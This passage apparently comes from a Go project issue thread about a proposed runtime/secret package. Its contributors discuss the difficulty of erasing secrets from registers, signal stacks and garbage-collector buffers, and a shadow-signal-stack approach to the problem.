As I said before, for any absolute guarantees, you probably want memfd_secret (https://lwn.net/Articles/865256/).

Comment From: gopherbot

Change https://go.dev/cl/600635 mentions this issue: runtime/secret: implement new secret package

Comment From: randall77

Question about secret.Do behavior. Which registers do we need to clear, exactly? I think there are 2 options:

  1. Clear all registers that Go compiler might use
  2. Clear all registers the architecture has

1 seems more straightforward, but I'm not sure it covers enough. 2 seems doable, but it could be a lot of registers. For instance, do we have to clear all the AVX512 registers? I could imagine that we could declare that assembly must clear such registers if it uses them. secret.Do would only clear registers that might be used by Go code.

By "used by Go code" we would have to include things like uses in internal/bytealg and any other runtime-implicit assembly.

Comment From: ianlancetaylor

The goal of this function is to make things as safe as possible at the cost of some efficiency. Therefore I think we should aim to clear all registers.

Comment From: randall77

So I've made some progress on this in CL 600635. But I've also discovered some really thorny issues that make it look to me a lot harder than I originally thought.

  1. Signals. When a signal comes in and interrupts a secret.Do invocation, it writes the contents of all the registers to the signal stack. Our signal handler can detect that, but it isn't easy to fix. We can't just erase that memory in the signal handler, because then on return from the signal handler that erased memory will get restored to registers and corrupt the register state. So we have to somehow keep track of which signal stacks have secrets in them so we can erase them at some later time. Erasing signal stacks is tricky, because they are signal stacks and could get used at any time to handle a signal. So erasing probably involves blocking signals on the affected Ms, doing the erasing, and restoring. This could be doable, but it is very finicky, os-specific code.
  2. Write barriers, and GC more generally. When secret code is running, we might need to record some pointers in write barriers, and then flush those pointers on to the general GC buffers for use in heap marking. Those pointers could be secret in various ways (e.g. using a byte of a secret to compute a location in a table). But as soon as pointers hit the write barrier buffer we've lost the association of the pointer to the G that sourced it, and thus its secretness, so it is hard to know what needs to be zeroed afterwards. Every GC thread that processes GC buffers might load a bunch of those secret pointers into registers, and those GC threads aren't marked in any way as processing secrets. Those threads might then get interrupted (see point 1), call into C code with those registers uncleared, etc.
  3. Other. There is at least a third mechanism by which secrets are escaping my best efforts at containment, as exercised by the tests in my CL. I'm not yet sure how that is happening, but it isn't obvious.

For point 2, maybe there is some scope to say "pointers aren't secret" in some way that is still useful. For instance, the obvious ways that a secret could be encoded in a pointer also lead to timing attacks, so maybe crypto code wouldn't do such things anyway? It seems challenging to figure out how to say such a statement in a spec, though, and part of the point of secret.Do is that its semantics are simple.

I've reached the point where I think I can safely say that this is going to require a lot more engineering work than me hacking on it for a few days. So I'm going to pause for now and hope maybe some ideas can be found to drag this proposal back into feasible territory.

If anyone knows of other languages/frameworks/etc. that implement this feature, I'd be really interested to know how they did it. The signal problem seems pretty universal across languages, and the pointer/GC problem seems pretty universal across garbage-collected languages.

Comment From: gopherbot

Change https://go.dev/cl/704615 mentions this issue: runtime/secret: implement new secret package

Comment From: DanielMorsing

I've done a bit of thinking and I might have a solution to the signal stack clearing problem. Paradoxically, it involves copying the secret state into another bit of memory.

On linux amd64 and arm64 (and I suspect many other platforms, but I have not tested on them yet), there is no requirement that the sigreturn system call be executed on the signal stack registered with the kernel. During secret mode, we can allocate a shadow signal stack and use that to return. Once we get a signal, we can copy the state off the registered stack, erase it, switch to our shadow stack for the return, and execute sigreturn, leaving a pristine signal stack. When exiting secret mode, we can erase the shadow stack without getting in the way of any other signal delivery.

I have a template for this scheme at CL 704615, based on the work that Keith did last year (many thanks! it's been massively helpful). I still need to do performance testing and polish it into something more usable.

As for pointers leaking into the GC buffers, I think it is highly unlikely that anything can be gleaned from pointer offsets. The crypto code avoids it religiously (because of constant time requirements) and the other big use that I see for this feature (grab API key from secret store, establish authenticated connection with external API, throw away API key) doesn't encode anything confidential into pointer offsets. That does leave the unenviable task of defining what exactly the confidentiality boundary is, but that's doable.

Comment From: DanielMorsing

I think I found the culprit for the leaks that Keith was seeing. It was the kernel spilling onto the g0 stack when calling into the vDSO. With the signal stack change and erasing registers when entering the vDSO, I have yet to make the tests fail.